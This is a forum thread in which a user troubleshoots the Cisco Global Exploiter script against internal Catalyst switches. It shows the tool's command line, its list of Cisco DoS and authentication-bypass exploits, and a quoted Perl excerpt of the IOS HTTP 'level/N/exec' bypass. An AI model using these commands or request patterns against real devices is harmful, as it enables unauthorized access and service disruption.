Its intranet and what kind of vulnerabilities you got to exploit.Cisco IOS or SNMP Exploits?Originally Posted by demonize
cisco global exploiter
I am testing 4 of our internat cisco catalyst with cisco global exploiter and each time i get: vulnerability successfully exploited with 16
what does that mean?
I search google and didn't find any help full information.
Its intranet and what kind of vulnerabilities you got to exploit.Cisco IOS or SNMP Exploits?
Sorry i am not sure of what your asking.what kind of vulnerabilities you got to exploit.Cisco IOS or SNMP Exploits?
./cge.pl -h host -v 3 ( cisco IOS HTTP Auth Vulnerability)
WHAT DOES THAN MEANS?????????????????vulnerability successfully exploited with 16
What is the actual command you're typing?
I'm a compulsive post editor, you might wanna wait until my post has been online for 5-10 mins before quoting it as it will likely change.
I know I seem harsh in some of my replies. SORRY! But if you're doing something illegal or posting something that seems to be obvious BS I'm going to call you on it.
He has mentioned the command already
./cge.pl -h host -v 3 ( cisco IOS HTTP Auth Vulnerability)
for exploiting HTTP authentication on Cisco IOS.
That does not follow the syntax required by the script.
If that's the command he used then there's no surprise it didn't work unless "host" is actually a valid hostname on his local network which seems doubtful. Additionally the -v switch does not take a string "3 ( cisco IOS HTTP Auth Vulnerability)".
I'm a compulsive post editor, you might wanna wait until my post has been online for 5-10 mins before quoting it as it will likely change.
I know I seem harsh in some of my replies. SORRY! But if you're doing something illegal or posting something that seems to be obvious BS I'm going to call you on it.
Here is how i typed it inAdditionally the -v switch does not take a string "3 ( cisco IOS HTTP Auth Vulnerability)".
./cge.pl 192.168.1.254 -v 3
[1] - Cisco 677/678 Telnet Buffer Overflow Vulnerability
[2] - Cisco IOS Router Denial of Service Vulnerability
[3] - Cisco IOS HTTP Auth Vulnerability
[4] - Cisco IOS HTTP Configuration Arbitrary Administrative Access Vulnerability
[5] - Cisco Catalyst SSH Protocol Mismatch Denial of Service Vulnerability
[6] - Cisco 675 Web Administration Denial of Service Vulnerability
[7] - Cisco Catalyst 3500 XL Remote Arbitrary Command Vulnerability
[8] - Cisco IOS Software HTTP Request Denial of Service Vulnerability
[9] - Cisco 514 UDP Flood Denial of Service Vulnerability
Ok that's what I was looking for (even if secure_it didn't get it).
Now looking at the code of the script. If the message you're getting back is:
Then it's not parsing things correctly or it's not happy with your Cisco device somehow.Code:vulnerability successfully exploited with 16
If things were working correctly for the commandline you provided it should return:
However, if you look at the code you can simply do the test via any browser and see if successful or not.Code:Vulnerability successful exploited with [http://192.168.1.254/level/16/exec/....]
I'm a compulsive post editor, you might wanna wait until my post has been online for 5-10 mins before quoting it as it will likely change.
I know I seem harsh in some of my replies. SORRY! But if you're doing something illegal or posting something that seems to be obvious BS I'm going to call you on it.
If I am not wrong.level 16 is pointing to privilege level that is in execution mode.but in My knowledege there is level upto only 15 or administrator level.correct me thorin If I am wrong.http or SDM access is restricted to by default level 15 user only.Is this vulnerability trying to break into using level 15 privilege?
Yup you're kinda right, but the variable which represents the level in the code is primed to a value of 16 and loops through every value to 99.
Code:sub cisco3 # Cisco IOS HTTP Auth Vulnerability { my $serv= $host; my $n=16; my $port=80; my $target = inet_aton($serv); my $fg = 0; LAB: while ($n<100) { my @results=exploit("GET /level/".$n."/exec/- HTTP/1.0\r\n\r\n"); $n++; foreach $line (@results){ $line=~ tr/A-Z/a-z/; if ($line =~ /http\/1\.0 401 unauthorized/) {$fg=1;} if ($line =~ /http\/1\.0 200 ok/) {$fg=0;} } ..........
I'm a compulsive post editor, you might wanna wait until my post has been online for 5-10 mins before quoting it as it will likely change.
I know I seem harsh in some of my replies. SORRY! But if you're doing something illegal or posting something that seems to be obvious BS I'm going to call you on it.
Posting Permissions